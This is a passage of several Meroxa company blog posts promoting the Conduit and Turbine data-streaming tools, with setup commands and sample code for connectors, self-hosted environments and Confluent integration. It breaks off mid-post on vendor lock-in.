The responsibility of connecting different data stores has historically fallen to an entire team of developers who write custom code and manage complex data integrations. Conduit, an open-source project powered by Meroxa, has made this undertaking a lot simpler. We designed the Conduit SDK with data movement best practices in mind, requiring fewer developers to build out pipelines with the same level of efficacy but with greater efficiency. If you’re unfamiliar, Conduit is a data integration tool for developers built with the purpose of moving data from point A to point B and it does this via the use of connectors. By adding Open AI’s GPT-4 into the mix to speed up the build of connectors, connecting data sources has become a breeze for us. In this blog post, we’ll go over why speeding up connector building was necessary and how we were able to accomplish it via GPT-4.

Why Did We Need to Reduce Connector Build Time?

On the government side of our business, we operate as a small, lean team with multiple efforts happening in tandem. One of those efforts is a project with the United States Space Force to build data pipelines from commercial and government providers to a central repository or library where the aggregated data can be easily accessed and utilized. Getting those pipelines built quickly is of the utmost importance to the customer due to demand, so reducing the time to build connectors without burdening our team was essential. Not only is reducing build time beneficial for the government team, but it’s also beneficial to our company and our users as a whole. This worthwhile investment will pay dividends down the road.

How Did We Accomplish This?

Well, the title of this blog post and opening paragraph gives the answer away - we used OpenAI’s GPT-4 😂. We ultimately decided to use it because it allowed us to reduce the time to build a connector as it is able to automatically generate high-quality code, configuration templates, and documentation, significantly speeding up the development process. It assisted us in rapidly iterating through dev cycles, finding potential issues and providing helpful insights, thus greatly reducing the time and effort required for data pipeline building.

By harnessing this capability, we successfully reduced the development time of connectors. By feeding Conduit connector code to GPT-4, we enabled the model to learn and generate connector code from prompts, streamlining the development process. Here are the system prompts we used to direct GPT-4 in building the connector:

You are an expert Go developer.
Conduit is an open-source data integration tool written in Go.
Here is the code for the Conduit Connector SDK for a Source Connector.
Here is the code for an example Source Connector for Kafka.
Write a source connector for <insert connector you want to build here>. CODE ONLY.

Like magic, GPT-4 generated functional code we were able to use to build connectors. Keep in mind GPT-4 is not flawless. It fell short in cases where the generated code occasionally contained errors due to a lack of context regarding external dependencies, which is sometimes evident in the generated unit tests. While the model typically does a commendable job of rectifying errors with further prompts, developer expertise and intervention are occasionally necessary to address these issues. Keeping that in mind, there are a host of benefits we’ve experienced using GPT-4 such as:

Generating functional Go code for Conduit connector within seconds.
Receiving guidance on debugging various issues encountered during development.
Being able to feed it additional prompts to rewrite and optimize functions.
Streamlining development through efficient struct generation for handling deeply nested responses for various APIs, enabling seamless data integration and pipeline building across multiple platforms.
Rapidly generate unit tests for input code snippets, which is a significant advantage, as may developers find writing tests tedious.

To see an example of a connector we build using GPT-4 check out our Spire Maritime AIS source data integration connector. If you’re up for the challenge of using GPT-4 for your development efforts, we urge you to try it out!

If you’re interested in learning more about Conduit check out theConduit documentation, theConduit API documentation, and theConduit SDK.

Join the discussion on GitHub or become a part of our community to share your experiences in using GPT-4 to tackle your data integration challenges. We're excited to hear from you!

Spire Maritime AIS Source Data Integration now Generally Available

Sara Menefee — Wed, 24 May 2023 14:04:43 GMT

We are excited to announce general availability of the source data integration withSpire Maritime AIS. Meroxa customers can stream maritime activity from theSpire Maritime 2.0 GraphQL API, transform that data using function code, and deliver to any downstream destination in real-time.

This is a first of its kind source data integration with Spire Maritime AIS that works natively with a stream-processing data platform.

Spire Maritime AIS delivers real-time global maritime activity information by using a constellation of satellites and terrestrial sensors that track and transmit vessel and ship signals to provide their location, routes, and movements.

Organizations worldwide analyze and process insights from the Spire AIS APIs and TCP stream to help with global logistics, collision avoidance, surveillance, fishery management, and environmental monitoring.

Meroxa is a Stream Processing Data Application Platform as a Service that enables developers to build and run stream-processing data applications that respond to real-time data and events while managing all of the underlying infrastructure required to scale stream-processing workloads.

The Meroxa platform manages the underlying infrastructure required to scale stream-processing data applications and was designed to work natively with our own in-house designed, easy-to-use application framework called Turbine. Turbine enables developers to quickly build using popular programming languages, such as Python, JavaScript, Ruby, and Go, without needing to write domain-specific code.

Getting started with Spire Maritime AIS on Meroxa

To stream maritime activity from Spire Maritime AIS on the Meroxa Platform, you must have an existing Spire AIS client account. If you are not already a client and wish to purchase Spire AIS products, you should contact the Spire AIS team directly.

Once you have a unique API token, login to your Meroxa account and create a Spire Maritime AIS resource. Don’t have a Meroxa account? Contact us to get started.

Create a Spire Maritime AIS Resource

In order for a Turbine streaming application to securely connect with the Spire Maritime 2.0 GraphQL API as a source, a Resource must be created.

Resources are used by the Meroxa platform to abstract sensitive credentials away from the Turbine application code. In this section, we’ll guide you through the steps on how to create Spire Maritime AIS Resources.

As mentioned earlier, we require a unique Spire Maritime 2.0 GraphQL API token to create a Meroxa resource. This can be acquired by contacting a representative at Spire AIS. Once you have received your API token, login to your Meroxa account and create a Spire Maritime AIS resource in one of two ways:

Meroxa CLI

In the following example, we create a Spire Maritime AIS resource named my-spire-ais. Resources names may contain lowercase letters, numbers, underscores, and hyphens. We recommend that you choose something easy to identify as this will be used to refer to your Spire Maritime AIS resource when writing your Turbine application code.

Using the Meroxa CLI by running the following command:

meroxa resource create my-spire-ais \
--type spire_maritime_ais \
--token $SPIRE_MARITIME_AIS_API_TOKEN

Replace the $SPIRE_MARITIME_AIS_API_TOKEN placeholder in the example command above with the API token provided by the Spire AIS team. When you’re ready, simply hit return and wait for confirmation through the Meroxa CLI that the resource has been successfully created.

Meroxa Dashboard

Below are the steps required to create a Spire Maritime AIS resource using the Meroxa Dashboard:

Navigate to theResources tab.
Click the Add a Resource button.
Search for Spire Maritime AIS using the search bar.
Click the Add Resource button forSpire Maritime AIS.
Confirm you are on the Add a resource form withSpire Maritime AIS selected.
Provide a valid Resource Name (e.g.,my-spire-ais,myspire,spire123).
Provide a valid and unique Spire Maritime AIS API token.
Click the Save button.

Resources can be updated in the Meroxa dashboard by going to theResources tab in the dashboard and clicking on theSpire Maritime resource you’d like to update. You can update

We do not display credentials, such as the API token, in any of our interfaces. However, if you need to update the API token at any time, you can do so in the Meroxa Dashboard or the Meroxa CLI.

A notification in the dashboard will appear once your Spire Maritime AIS resource has been successfully created.

Using Spire Maritime AIS as a Source with Turbine

Now that a Spire Maritime AIS resource has been created, you can use the Turbine application framework to stream and transform data in real-time directly from the Spire Maritime 2.0 GraphQL API to any destination. To do this, you must have the Meroxa CLI installed.

In the following examples, we will demonstrate how to do this with JavaScript using TurbineJs.

First, initialize a Turbine streaming app by running the following command in the Meroxa CLI:

meroxa app init my-spire-app --lang javascript

A printed confirmation will let you know when you have successfully initialized your Turbine streaming app, meaning the application project files will be created in your current local directory. You may also include a --path argument at the end of the command to provide an alternative local path.

Next, run a command to get to the root of the Turbine application project:

cd my-spire-app

Within the project directory, you will find an app.js file. Open this with your preferred code editor. There you will see self-documented boilerplate code with a custom function written in JavaScript to execute against the example data record set provided in the fixtures directory.

To use the Spire Maritime AIS resource, directly pass its name (my-spire-ais)as the only argument to theresources method.

To represent the source data stream, a records method is used. Because there is no concept of a collection of data with the Spire Maritime 2.0 GraphQL API, simply pass through an empty string:

exports.App = class App {
  async run(turbine) {
    let source = await turbine.resources("my-spire-ais");
    let records = await source.records("*");
  }
};

That’s all it takes to get real-time maritime data streaming into your Turbine application.

There are a couple of additional configurations that can be defined in your Turbine application code.

Source Configurations

The following source configurations are supported:

Configuration	Required?	Example	Description
batchSize	No, optional. Default is 100.	100	Sets the maximum number of results to retrieve from the Spire Maritime 2.0 GraphQL API.
### query	No, optional. See Data Record Format for default queried data.	GraphQL query.	Send a custom GraphQL query to the Spire Maritime 2.0 GraphQL API.

What’s Next?

All that is left is for you to write function code to transform your Spire Maritime AIS stream data and event records to a downstream set of data stores, databases, or third-party APIs. Imagine what you can do with the power of Spire Maritime AIS at your fingertips.

Need potential ideas for Turbine streaming apps? Check out our example Turbine app examples to get started. But don’t let these examples hinder you. There is no limit to what you and your team can achieve using Spire Maritime AIS and the power of the Meroxa platform.

We can’t wait to see what you build! 🚀

As always, if you need help, have questions, or just want to chat:

Don’t have a Meroxa account? Schedule an onboarding session with our team.
Have a technical question? Reach out via email at support@meroxa.com.
Join our Discord community.
Follow us on Twitter.

Is Volatility “swamping” Your Data Discovery?

Keith Haller — Tue, 16 May 2023 21:18:06 GMT

Data volatility is a significant challenge that organizations face when dealing with big data. The traditional Vs of big data - Volume, Velocity, and Variety, fail to capture the impact that volatility has on the success of big data projects. Volatility refers to data whose value fluctuates over time, making it challenging to identify, store, and process. Volatility demands discovery and discovery drives the long-term health of big data efforts.

In this blog post, we discuss the significance of volatility and how it impacts the overall success of big data projects. We explain how managing data volatility effectively can pave the way for a more adaptive data environment that unlocks the true potential of your volatile data.

To achieve this, organizations need to rethink their approach to data discovery. By empowering data stakeholders with development best practices and tooling, businesses can draw better business conclusions from their volatile data. We identify the key requirements for an effective data discovery strategy, including the need for AI-driven, open-source connectors, a code-first approach using established development best practices, and an efficient local testing solution.

The Big “Big Data” Problem

Big data efforts fail 85% of the time. In fact, it has been well documented that 70-80% of small data, data warehouses also failed. The reason for these high failure rates lies in their shared platform-led approach to optimization and neglect of discovery. That narrow focus hampered their ability to remain relevant and up-to-date. As a result, big data lakes turned into swamps, and small data warehouses lost their reliability.

Source: https://designingforanalytics.com/resources/failure-rates-for-analytics-bi-iot-and-big-data-projects-85-yikes/

The crux of the problem is that these efforts do not foster effective discovery processes driven by developers. Instead, they adopt a platform-led discovery approach that introduces significant delays and prevents developers from adequately supporting the discovery process. Consequently, these big data initiatives are unable to adapt and meet the evolving needs of the business.

The fact that big data is big is a challenge. A platform-led approach is very good at optimizing performance of known challenges using known data. However, big data solving known performance challenges is not why data lakes turn into swamps or why they continue to fail at 85%. They fail because they do not enable developer-led discovery to keep the data relevant and current to the needs of the business.

💡 For example, a popular ride-sharing company, managed over 100 petabytes of data, including trips, customer preferences, location details, and driver information. As the volume and velocity of data increased, the company had to build such a system that required significant investment in resources and infrastructure, highlighting the complexities of managing and leveraging massive amounts of data. Source: https://www.uber.com/en-CA/blog/uber-big-data-platform/

Why is Volatility the most important V?

Big data has traditionally been defined by the 3Vs. The 85% percent failure rate of Data Lake projects can be explained by the missing fourth V, which is volatility. Volatility refers to data whose value is indeterminate and changes quickly. Volatility considers changes in business objectives in real-time and how the value of data fluctuates depending on the current needs of the business.

Volatility impacts the original 3Vs in the following ways:

Volume: Volatility of data storage can result in swamps of unused data, and prevent discovery because potentially impactful data is left out.
Velocity: Volatility of necessary latency of data can also lead to even greater volume and performance problems.
Variety: Volatility in data types and needed connectors complicate identifying valuable data, integrating new sources, and maintaining effective data management systems.

In short, Volatility is the most important because your data stores can’t evolve to meet the needs of your business unless you properly handle volatility and its impact on discovery.

Rethinking the Approach to Volatile Data Discovery

Challenges such as technology complexity, and poorly defined business objectives, make data discovery a daunting task. Coupled with rapidly evolving business conditions and the inherent volatility of data, organizations often struggle to discover insights from their data. Although companies can execute data discovery projects, these efforts often come at a significant cost in terms of resources, system expertise, and long timelines. Even with such investments, businesses may still fail to achieve meaningful conclusions due to the constantly changing nature of business.

Addressing these challenges requires a new approach to data discovery that empowers data stakeholders with development best practices and tooling. By placing data stakeholders as the lead for discovery, they can draw better business conclusions from their volatile data.

Embracing an Effective Developer-led Discovery Strategy

The right tooling to embrace an effective data discovery strategy should offer the following:

Put the data stakeholders closest to the data
Remove the need for expertise in complex data technologies
A fast, AI-driven, open-source, cross-platform approach for building connectors is vital.
- Connectors should be built quickly to support discovery.
- Open source connectors enable sharing not only within a single department or platform but also benefit the enterprise.
A code-first approach using established development best practices:
- Leverages developers' existing expertise in specific programming languages.
- Enables developers to efficiently utilize familiar tools and frameworks.
- Encourages custom solutions, collaborations, and integrates into existing workflows
An efficient and cost-effective local testing solution:
- Rapid iterations enable stakeholders to respond to changing business requirements.
- Allows for safe experiment with new data of uncertain value in an isolated environment without affecting the main system or incurring significant storage costs.
The right tool should answer questions like, "What data should I collect now?" and "Why should I collect this data?" without being cost-prohibitive or resource intensive.

Addressing Data Volatility & Discovery with Meroxa

Having explored the significance of data volatility and the necessity for a developer-led approach, it becomes clear that organizations need a solution that caters to these requirements. Meroxa is that solution. Designed to address the challenges of data volatility, Meroxa empowers developers to take control of their data discovery.

Meroxa offers a vendor-neutral, developer-led, open-source, code-first approach that integrates well into any existing infrastructure.

Programming Language and Connector Neutral

Meroxa's programming language and connector neutral approach empowers developers to maintain optimal productivity. By providing connectors for a wide range of data stores, such as databases, cloud platforms, SaaS applications, APIs, data lakes, and messaging systems, Meroxa enables seamless integration and flexibility, catering to diverse needs in the ever-evolving technological landscape.

Meroxa addresses this issue by offering connectors for any data store, including databases, cloud platforms, SaaS apps, APIs, data lakes, and messaging systems.

Developer Led

In order to increase velocity and reduce time to value of new data products and initiatives, the Meroxa platform supports a developer-led, self-service approach. Once resources (such as databases and APIs) have been onboarded to the platform, they are made available for use via friendly names, with all unnecessary implementation details abstracted away.

This significantly reduces complexity by removing the need for deep knowledge of every resource type and improves flexibility as swapping resources is a matter of changing the reference. Developers can typically deploy fully functioning, production grade pipelines within hours.

Granular resource-specific security can be passed through the platform by applying security controls on the resource (taking advantage of the full fidelity of permissions and controls) and then registering associated credentials with the platform. Credentials are never displayed to the end user fully abstracting access.

Open Source

Meroxa embraces open-source principles to encourage collaboration and innovation within and beyond enterprises. Developers can build connectors faster with Meroxa's AI-driven method, and connectors are based on data stakeholder demands and actual use cases, rather than being dictated by platform providers' assumptions about what is needed.

Meroxa's open-source connectors are designed for rapid deployment, allowing developers to quickly and efficiently access a wide variety of data sources. By embracing the power of collaboration and developer-driven innovation, organizations can unlock the true potential of their data and drive innovation like never before.

Code-First

The Meroxa Turbine toolchain delivers a rich local development experience, allowing for a rapid/tight feedback loop. It builds on decades of software engineer processes and workflows, providing a familiar and robust developer experience. Developers build stream processing applications and pipelines using their favorite programming languages. They can leverage the wealth of existing libraries and packages in those languages.

One of the key features offered by Meroxa is local testing. Local testing creates a safe, isolated environment for developers to experiment with new data, test its value, and explore its potential uses without affecting the main system or incurring significant storage costs, empowering developers to innovate freely.

Organizations can also extend their software development processes and workflows to encapsulate data engineering with native support for Git, seamlessly integrating data operations into the established software development life cycle.

Conclusion

On a final note, reducing the time it takes to build data solutions is crucial for businesses to stay agile and competitive in today's fast-paced environment. Meroxa's developer-led approach empowers developers to take charge, streamlining the process and enabling quicker conclusions to evolving business needs. By shifting focus from platform-led optimization of data-driven projects to developer-led discovery, companies can enable their big data projects to evolve with the needs of the business. In essence, Meroxa's developer-led paradigm has the potential to guarantee success for your big data project in a world that has forever suffered with an 85% failure rate.

Don't let data volatility swamp your big data efforts. Don’t be part of the 85% failure rate of big data projects. To get in touch and see how Meroxa can help transform your data strategy, reach out to us by joining our community or by writing to info@meroxa.com.

Turbine + Self-Hosted Environments: Data Isolation For Streaming Apps

Jennifer Hudiono — Tue, 09 May 2023 13:32:05 GMT

Today, we’re excited to announce Turbine support within Self-Hosted Environments. Software developers can now build and deploy Turbine data applications in Self Hosted Environments.

We know that with the need for data security and compliance becoming more critical, teams often have to choose between speed (time to deploy) or compliance (minimizing risk with sensitive data). Data isolation is a critical component of any data streaming application, as it helps to ensure the accuracy and reliability of data processing while also enhancing data security. At Meroxa, we've done the work to eliminate implementation complexity while still offering complete operational control over your data security, compliance, and performance needs.

Getting started with Environments

First, you'll need access to the Self-hosted Environments Beta to get started. Request access with the link below: Sign-up for the Self-hosted Environments Beta.

A member of our team will reach out with the next steps. You will need access to your cloud provider to generate credentials with the necessary permissions to provision an environment. For more information on how to set up your Environment, refer to our setup documentation.

Creating an Environment

You can provision a Self Hosted Environment through our dashboard in the Environments tab > Create Environment.

Or through our CLI. As part of the environment provisioning process, credentials from your cloud provider with the appropriate permissions are required.

$ meroxa env create my-env \
--type selfhosted \
--provider aws \
--config {"aws_access_key_id":"$AWS_ACCESS_ID", "aws_secret_access_key": "$AWS_SECRET_KEY" }

The Meroxa Platform will perform a preflight check to verify permissions before generating a new VPC and the associated dependencies in your cloud. A secure remote connection will be maintained automatically with the Meroxa platform for the control plane to ensure everything operates smoothly.

Once successfully provisioned, you are ready to start creating Resources and build Turbine apps within your Self-hosted Environment.

Create a resource

In order for a Turbine streaming application to securely connect with a data source or destination, one or more Meroxa Resources must be created. The resource must be added to the environment for it to be accessible. Resources created in the common environment will not be accessible in your environments.

You can add a Meroxa resource via the dashboard under Resources tab > Add Resource. Under the environment dropdown, select the environment to create the resource in.

You can also do this via our CLI.

# Create a resource

$ meroxa resource create my-postgres \
--type postgres
--env my-env
--url postgres://user:password@host.example.com:5432/db_name

Using the ‘env’ tag in the CLI allows you to indicate which environment to create them in. The default environment is common.

Once you’ve added your resources, you’re now ready to build your Turbine app! If you need help, check out our Quickstart Guide.

Building a Turbine streaming application

In the example below we will build a Turbine J application and deploy to our Environment. Other languages such as Python, Ruby, and Go are also supported. Initialize the streaming app within the local directory you are currently in by running the following command:

$ meroxa apps init myapp --lang js

You may define a different local directory path for the app project by using --path /your/local/path/ in your command. A local app project directory will automatically be created on your local machine, complete with everything you need to build a streaming app. Open your Turbine project and look for the app.rb file. This is where you will be writing your Turbine streaming application code. It should already contain a basic boilerplate like below to get started.

In the next section, we will deploy the example app to our environment.

Deploying a Turbine streaming application in a Self Hosted Environment

Before deploying your application, ensure the resources used by your Turbine data app exist on the Meroxa Platform. You can check using the Meroxa Dashboard or CLI by running the meroxa resources list command --this command lists all resources and their state. If the resources don't exist, you must configure your resources using the Meroxa Dashboard.

The Turbine framework uses git for version control. Upon initializing your application, git init is performed locally on your behalf. This creates a new repository in the project folder of your Turbine data app, which can be used to track your code. You will need to commit your code changes before deploying.

Using the Meroxa CLI, run the meroxa app deploy command in the project folder root of your Turbine data app, this will start the process of deployment.

$ meroxa apps deploy --env my-env

Using the ‘env’ tag in the CLI allows you to indicate which environment to deploy your application, by default the application will be deployed to the Common Environment.

The Meroxa CLI will print out the steps taken and confirm once deployment is successful. You can view your newly deployed application in the dashboard or via the CLI. For a more detailed walkthrough of deploying a Turbine application to an environment, refer to our documentation.

Viewing your newly created application

In the dashboard, you can view your newly created application in your environment under the Apps tab.

In the CLI, you can run the command below to list and view your applications.

$ meroxa app ls
UUID         NAME        LANGUAGE   GIT SHA   STATE   ENVIRONMENT 
====== ================ ========== ========= ======= =============
8ed...     my-app       javascript   ad87... running    my-env

Have questions or feedback?

We love hearing from our customers! If you have questions or feedback, please feel free to contact us directly at support@meroxa.com or by joining our Discord community server. We're excited to see what you build 🚀

Build Real-Time Data Apps Faster with Confluent + Meroxa

Keith Haller — Thu, 27 Apr 2023 19:46:04 GMT

In today's data-driven world, building and working with data products can be challenging. It requires profound technical knowledge and may even demand an infrastructure overhaul of existing systems. Meroxa’s code-first approach and infrastructure abstraction are key to effectively leveraging your existing infrastructure and engineering team. This can simplify complexity, promote efficiency, reusability, and customization.

In this blog post, we will explore how Meroxa's data platform can enhance your experience when working with Confluent. By utilizing a code-first approach and infrastructure abstraction, we can significantly shorten your investment time from months to minutes and boost the value of your existing investment.

Code-first approach

Taking a code-first approach allows data stakeholders to build upon their established knowledge and collective expertise. Meroxa's Turbine framework is designed with developers in mind, providing a rich local development experience that enables the best practices of software engineering processes and workflows. It allows unparalleled customizability and flexibility when working with Confluent, without the need for deep technical expertise.

Lower the bar to entry and fast start: One of the main benefits of using Meroxa with Confluent Cloud is that it enables your existing teams to rapidly adopt Confluent and Kafka technologies without extensive training or external support. Meroxa simplifies the process of building stream processing applications. For example: (1) developers working with familiar languages and tooling, (2) simplifying the environment setup, (3) logging and monitoring can be implemented with the tool of your choice, (4) using a software workflow for building and testing the application eliminates needing to develop your own. This allows the focus to be working with the data rather than on the underlying complexities of your data infrastructure.

Leverage your existing SDLC workflow and tooling: Meroxa enables you to leverage your existing Software Development Life Cycle (SDLC) workflow and tooling while offering ease of scalability, multiple environments, Git support, CI/CD integrations etc. Meroxa developer workflows that have been refined over years through software engineering best practices, provide tooling and support often missing in today's data projects. With Meroxa you can establish enterprise-wide best practices with Confluent. This increases collaboration and efficiency while maintaining the flexibility and customizability necessary for success in data engineering tasks.

Choose any language: Developers can create stream processing applications and pipelines using their programming language of choice (Python, Go Lang, Javascript, Ruby, etc.), while taking advantage of existing libraries and packages within those languages. By empowering developers with familiar languages and tools, a code-first approach fosters efficiency, reusability, and customization, maximizing the potential of the developer team and saving time and resources.

Infrastructure Abstraction

Infrastructure abstraction is a key feature of the Meroxa Data Platform, streamlining complex data technologies and making them more accessible.

No rip and replace; sits alongside your existing infrastructure: Typically, integrating new data tooling can be disruptive and costly as it requires the development team to re-engineer their data processing pipelines, to learn new programming paradigms, and to adjust their monitoring and management practices. Meroxa sits seamlessly integrates with all your current systems. The resource catalog abstracts the complexities and idiosyncrasies of the supported resource types and presents a simple, unified way to consume data from and/or push data to the resource via a common name.

Allows your team to focus on driving business value: By adopting a code-first approach, Meroxa simplifies the connection process to various resources, supporting the connection of Confluent streams to any destination and vice versa. This freedom of connectors and rapid development capabilities enable developers to deploy fully functioning, production-grade data products from what was months before to minutes. Once resources have been onboarded, they are made available for use via friendly names, with unnecessary implementation details such as connection strings, authentication mechanisms, connector configurations, data formats, and connectivity details abstracted away. This lowers the barriers to entry for building data streams, allowing any data stakeholders to efficiently utilize the data, without the complexities of the given resource.

Automates the operation of the underlying infrastructure: Meroxa automates the management of underlying infrastructure, making it easier for developers to focus on their core tasks. Meroxa provides end-to-end automation, handling everything from packaging user-defined custom code to deploying it any cloud or on-prem. Meroxa provisions and configures the required connectors, integrates them with the custom code to create a seamless system. As traffic patterns fluctuate, the platform intelligently scales function nodes to accommodate changes in demand. Furthermore, Meroxa's self-healing capabilities ensure that any issues with components are promptly addressed, maintaining the stability and reliability of the system.

Meroxa + Confluent = More Value, Less Investment and Months to Minutes

Confluent provides a framework for data in motion, and the partnership with Meroxa helps engage business developers with self-service capabilities that boosts the value of the solution and potentially greatly reduces the investment time from months to minutes. Please see the illustration below. Meroxa’s approach generates greater value for Confluent clients with much less investment in much less time.

Confluent Cloud and Meroxa users do not have to deploy and manage the infrastructure for the stream processing application, allowing developers to build faster pipelines, without having to first solve infrastructure complexities. Meroxa offers a native integration into Confluent Cloud, not just self-hosted Kafka, allowing any data stakeholder to work effortlessly with Confluent Cloud.

Additionally, Meroxa enables streaming data into Confluent from any source, sending data from Confluent to any destination, and working with Confluent data in any format.

Confluent time to value curve

Confluent time to value accelerates with Meroxa****

Simple pipeline builds

Meroxa enables developers to quickly iterate and build simple pipelines by providing a rich local development experience allowing developers of any skill level to test out their hypotheses on data projects, reducing the complexity of working with data.

By allowing users to "sample" Confluent Streams, developers can rapidly local test on new data before committing to larger initiatives. This approach enables organizations to conclude faster on which projects to invest time and resources into, essentially allowing them to test before investing at speed.

Easy Pipelining

Meroxa brings software engineering best practices such as native support for Git and collaboration tools, allowing organizations to extend their software development processes and workflows to encapsulate data engineering.

Moreover, users can integrate packages and custom code modules, allowing for simple reuse of code within the organization and use of external 3rd party modules. By providing these features, Meroxa enables Confluent users to increase collaboration and efficiency, while maintaining the flexibility and customizability necessary for success in data engineering tasks.

Platform Effects

Meroxa enables Confluent users to reuse tested and proven departmental pipelines at an enterprise-wide level, follow enterprise-wide best practices, and benefit from CI/CD integrations and consolidated monitoring of pipelines. The platform also offers ease of scalability and multiple environments (development, testing, staging, and production) that are designed to serve specific purposes.

Enriching real time data streams without Meroxa Turbine

To enrich real time data in Confluent without Meroxa would require Kafka Streams or ksqlDB to implement your stream processing logic.

Kafka Streams: With Kafka streams, you would typically write a Java or Scala application using the Kafka Streams library. In your application, you would define your processing logic, for example: joining the source topic with other topics containing enrichment data, or filtering and aggregating the data. Additionally, you need to deploy the application to a suitable environment, and once it's deployed, you must set up logging and monitoring as well. Furthermore, you would also need to establish a workflow for building and testing the application.

ksqlDB: With ksqlDB, you would write a series of ksqlDB statements to define your stream-processing logic. This includes creating streams and tables, performing joins between streams and tables, filtering, and aggregating data.

Using Kafka Streams or ksqlDB for enriching real-time data streams can present challenges, depending on your use case and team expertise:

Steep Learning curve: Both Kafka Streams and ksqlDB have a steep learning curve, especially for those who are new to Kafka and stream-processing concepts. Developers need to familiarize themselves with the libraries and APIs, as well as the concepts of stream processing, such as windowing and stateful processing.
Language limitations: Kafka Streams only allows applications to be written in Java or Scala, which may not be ideal for teams with expertise in other programming languages. While ksqlDB offers a more accessible SQL-like language, it may still require some knowledge of the ksqlDB-specific syntax and features. Moreover, there are limitations to using SQL, as certain tasks cannot be accomplished using this language alone. For example, if you need to interact with a third-party API for data enrichment, or import a specific package to perform image manipulation, SQL would not be sufficient. In such cases, developers must resort to alternative approaches to address these complex requirements.
Complexity: Implementing stream-processing logic using Kafka Streams or ksqlDB can be complex, particularly when dealing with stateful processing, joins, and windowing operations. This complexity may lead to a longer development cycle and increased potential for errors.
Scalability and performance: Ensuring that your Kafka Streams applications or ksqlDB queries scale well and perform efficiently may require additional expertise in tuning and optimizing Kafka and the underlying infrastructure.

Enrich real time data streams with Meroxa Turbine

To enrich real-time data using Meroxa’s Turbine framework is simpler. You would simply connect your data streams and implement processing logic in the language of your choice. When implementing the processing logic, you can leverage libraries, packages and APIs you are already familiar with and that have been rigorously tested by millions of software developers.

Here’s a simple example of enriching a data stream using Turbine JavaScript where we convert temperature values from Celsius to Fahrenheit in a stream of weather data:

processDataStream(records) {
  records.forEach((record) => {
    // Use record `get` and `set` to read and write to your data
    const temperatureCelsius = record.get("temperature_celsius");
    if (temperatureCelsius !== undefined) {
      const temperatureFahrenheit = (temperatureCelsius * 9/5) + 32;
      record.set("temperature_fahrenheit", temperatureFahrenheit);
    }
  });

  return records;
}

Here is another example of enriching a data stream using Turbine Python using the datetime package, where we prepend a timestamp to each line of a log file:

import datetime

def prepend_timestamp(records: RecordList) -> RecordList:
    for record in records:
        try:
            payload = record.value["payload"]

            # Prepend timestamp to each log line
            log_line = payload["log_line"]
            current_timestamp = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
            payload["log_line_with_timestamp"] = f"{current_timestamp} {log_line}"

        except Exception as e:
            print("Error occurred while parsing records: " + str(e))
    return records

These are just two examples of how Meroxa makes it effortless to work with Confluent data streams using various languages. The possibilities are vast, limited only by your imagination.

Conclusion

Meroxa brings the best practices of software development for data to any environment without bias. Meroxa’s unique and disruptive approach with code-first and infrastructure complexity abstraction has been shown to greatly speed up the value of Confluent with a significant reduction in investment and time - months to minutes. The one example provided was for Confluent, but the same would apply for other key components of your existing architecture: cloud or on-prem, data-in-motion, data lakes and migrations.

To learn more about how Meroxa can help transform your data strategy, schedule a call with our team of experts.

Liberate Your Data from Vendor Lock-in with Meroxa

Rimas Silkaitis — Tue, 25 Apr 2023 16:43:35 GMT

As modern enterprises migrate to the cloud, they are often faced with an overwhelming number of vendor choices. Unfortunately, some companies make this critical vendor decision based on the products and services needed at that moment. This myopic approach leads to vendor lock-in.

Vendor lock-in is being stuck with a vendor that is no longer aligned with your goals and needs. Forbes puts it this way:

“It essentially forces an organization to continue staying with a vendor, whether due to the exorbitant cost of switching providers or the potential interruption that could occur from a change.”

In this post, we’ll look at the risks associated with vendor lock-in along with possible options to avoid those risks. Finally, we’ll see how Meroxa’s stream processing data application platform can help break your data free from vendor lock-in.

The risks and consequences of vendor lock-in

The pain of vendor lock-in becomes acute when your vendor cannot interact with your proprietary systems, open-source systems, or with those from another vendor. The negative outcomes of vendor lock-in may include:

Mounting costs and erosion of your bargaining edge.
Lack of flexibility to move to a different vendor, as the migration effort brings added cost, increased risk, and extended timelines.
Reduced service levels, as a vendor experiences outages but has little incentive to provide a resolution.
An incompatible tech stack, leading to difficulty in configuring free-flow systems.
The risk of losing access to data, applications, and other resources, if the vendor goes out of business.
The inability to leverage other vendors, which might offer better technology or pricing.

As we look at this extensive list of risks, we see the importance of carefully assessing the long-term implications of selecting the right vendor. How might an organization avoid these risks when it’s time to choose a vendor?

Avoid the risks of vendor lock-in

No organization intends to get stuck with a vendor and become forced to look for remediation measures later. To help guard against vendor lock-in at decision time, here are some key steps that enterprises can take:

When evaluating vendors, prepare a list of key non-negotiable attributes, such as cost, performance, features, and upward/downward compatibility.
Look for cloud services and platforms that use open standards and have broad industry support, making it easier to switch to another provider if needed.
Choose service providers that make it easy to export and import data between providers.
Review your cloud strategy regularly to evaluate whether your current provider continues to meet business needs.
Negotiate for flexibility in contracts to allow for switching providers in the future, whenever possible.
Prepare backup storage and computing resources for critical business processes, decoupling them from vendor-specific dependencies.
Establish a fallback plan with a strategy to migrate quickly in case your vendor closes its doors. Put simply: Always be exit-ready.

These measures focus on taking the right action the first time, thereby ensuring that your data, applications, and other resources are portable and flexible. While the suggested steps can certainly alleviate the risks of cloud vendor lock-in, you have no guarantee of avoiding vendor lock-in completely.

So what should organizations do if they are already locked in? What tools can help organizations liberate their applications and their data?

It’s important to note that liberation doesn’t mean abandoning your existing vendor. Rather, we want to empower an organization by decoupling the business KPIs from vendor performance and becoming agile in the process.

Meroxa is one such tool that solves the vendor lock-in problem. It allows organizations to utilize the best of the available products and services from multiple cloud providers while maintaining the free flow of data across the organization. Let’s look at how Meroxa does this.

How Meroxa liberates your data from vendor lock-in

Meroxa provides organizations with a unified and abstract view of their data—even as it’s stored in multiple cloud providers—thereby making it easier to move and manage data across different platforms.

By providing services such as data integration, orchestration, and stream processing, Meroxa enables organizations to take control of their data without being tied to a single vendor. As an end-to-end platform, Meroxa enables easy access, security, and governance of data across multiple vendors.

Among the tools and services provided by Meroxa, we’ll focus on Conduit and the Meroxa platform, both of which help organizations to move data among cloud platforms, bringing ease of switching between providers as needed.

Data integration with Conduit

Conduit is a low-level, open-source data streaming tool that helps developers move data across systems. Whether an organization needs to move data between databases, files, or APIs, Conduit supports all kinds of data motion. Conduit already ships with an extensive set of built-in connectors, but you can also write your own connectors—in any language—for custom data integrations.

One common use case for Conduit is data migration from Apache Kafka to PostgreSQL, an effort that would otherwise require extensive development, testing, and troubleshooting.

Stream processing applications with the Meroxa platform

